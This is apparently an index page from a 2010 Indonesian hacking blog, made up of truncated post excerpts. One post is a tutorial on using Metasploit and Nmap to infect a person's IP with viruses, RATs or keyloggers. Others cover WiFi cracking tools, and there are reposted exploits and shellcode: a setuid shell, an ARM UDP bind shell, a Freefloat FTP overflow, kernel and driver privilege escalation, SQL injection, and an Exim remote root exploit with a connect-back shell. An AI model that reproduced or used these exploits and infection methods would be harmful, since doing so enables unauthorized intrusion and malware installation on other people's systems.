Infect IP using METASPLOIT

Diposkan oleh oz family Friday, December 31, 2010
waduh baru kaku juga tangan ne ga nulis...sekarang bakal update lagi ne o2nri2nya,,,ok lanjut... ni tutorial ngebahas tentang gimana cara nya kita nginfect ip seseorang lewat metasploit jadi dengan gitu kita memasang program , virus,worm,RAT,keylogger atau apa aja terserah anda, ok lanjut di sini kita membutuhkan dua tool yg mungkin kalian semua udah pada g asing lagi lah ama tool ini yaitu METASPLOIT NMAP hal yg paling pertama kita lakukan tentu saja mencari target yah kalo target nya dalam...
Serangan bruteforce ke service ssh dan ftp memang bikin gondok. Hasil iseng ngebrowse membawa gw ketemu tools yang menarik dan lumayan mudah penggunaannya  Bruteblock membuat sistem administrator untuk ngebloking serangan bruteforce yang mengarah ke service UNIX . How this...

Crack Wifi

Diposkan oleh oz family Saturday, December 25, 2010
Wireless security auditing application This is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools. It should work on any version of linux running the following: Requirements: python python-qt4 macchanger aircrack-ng xterm For...
everyone..welcome back with me...marvellous a.k.a Liyan oz Probably some may be already knowing this ,but many dont... so this tutorial is for the second lot of the people ie for those who don't know how to use their own personal desktop machine to host an website which can be accessed from anywhere round the world. Been using it since around a month now and thought y not share it over here ;) .. I learnt this method from a friend who has nothing to do with HF and have made the complete tutorials...

OSX/Intel - setuid shell x86_64 - 51 bytes

Diposkan oleh oz family Tuesday, December 21, 2010
========================================== OSX/Intel - setuid shell x86_64 - 51 bytes ========================================== /* * Title: OSX/Intel - setuid shell x86_64 - 51 bytes * Date: 2010-11-25 * Tested on: Mac OS X 10.6.5 - Darwin Kernel Version 10.5.0 * Author: Dustin Schultz - twitter: @thexploit * * http://thexploit.com * * BITS 64 * * section .text * global start * * start: * a: * mov r8b, 0x02 ; Unix class system calls = 2 * shl r8, 24 ...
============================================== linux/ARM - Bind Connect UDP Port 68 Shellcode ============================================== /* * Title: arm-bind-connect-udp * Brief: Bind to port 68 on any local address and plug a udp shell * onto to port 67 on 192.168.0.1 * Author: Daniel Godas-Lopez <gmail account dgodas> */ .if 1 /* close(3), close(4), ..., close(1024) */ mov %r1, $1024 1: mov %r0, %r1 svc 0x00900006 subs %r1, %r1, $1 subs...
======================================================= Freefloat FTP Server Buffer Overflow Vulnerability 0day ======================================================= # Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability # Date: 12/05/2010 # Author: 0v3r # Software Link: http://www.freefloat.com/software/freefloatftpserver.zip # Tested on: Windows XP SP3 EN # CVE: N/A #!/usr/bin/python import socket import sys def usage(): print "usage : ./freefloatftp.py <victim_ip>...
=================================================== Freefloat FTP Server Buffer Overflow Exploit (Meta) =================================================== ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking ...
==================================================================== ViRobot Desktop 5.5 and Server 3.5 <=2008.8.1.1 Privilege Escalation ==================================================================== VULNERABLE PRODUCTS Hauri ViRobot Desktop 5.5 and below Hauri ViRobot Server 3.5 and below DETAILS: VRsecos.sys create a device called "VRsecos" , and handles DeviceIoControl Code = 0x8307202c , which use the function "strcpy" to copy memory from irp systembuffer to driver's data area ,...
======================================== VMware Tools update OS Command Injection ======================================== 1. Advisory Information Advisory ID: BONSAI-2010-0110 Date published: Thu Dec 9, 2010 Vendors contacted: VMware Release mode: Coordinated release 2. Vulnerability Information Class: Injection Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2010-4297 3. Software Description VMware Tools is a suite of utilities that enhances the performance of the virtual...
====================================================== UltraVintage <= Remote Multiple SQL Injection Exploits ====================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=1 3 3 3 _ __ __ ________ __ __ 3 7 /' \ /'__`\ /'__`\ /\_____ \ /\ \/\ \ 7 1 /\_, \/\_\L\ \ /\_\L\ \\/___//'/'...
================================================================= Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation ================================================================= /* * american-sign-language.c * * Linux Kernel < 2.6.37-rc2 ACPI custom_method Privilege Escalation * Jon Oberheide <jon@oberheide.org> * http://jon.oberheide.org * * Information: * * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4347 * * This custom_method file allows...

Exim 4.63 remote Exploit

Diposkan oleh oz family
======================== Exim 4.63 Remote Exploit ======================== #Exim 4.63 (RedHat/Centos/Debian) Remote Root Exploit by Kingcope #Modified perl version of metasploit module =for comment use this connect back shell as "trojanurl" and be sure to setup a netcat, ---snip--- $system = '/bin/sh'; $ARGC=@ARGV; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'))...

Assembly on Linux

Diposkan oleh oz family Sunday, December 19, 2010
Bagi seseorang yang bergelut di dunia security bahasa Assembly adalah bahasa yang wajib dikuasai. Karena bahasa ini adalah bahasa tingkat rendah, dekat dengan bahasa mesin (biner), maka mempelajari bahasa ini akan sangat menguntungkan. Dengan mempelajari bahasa assembly, sedikit...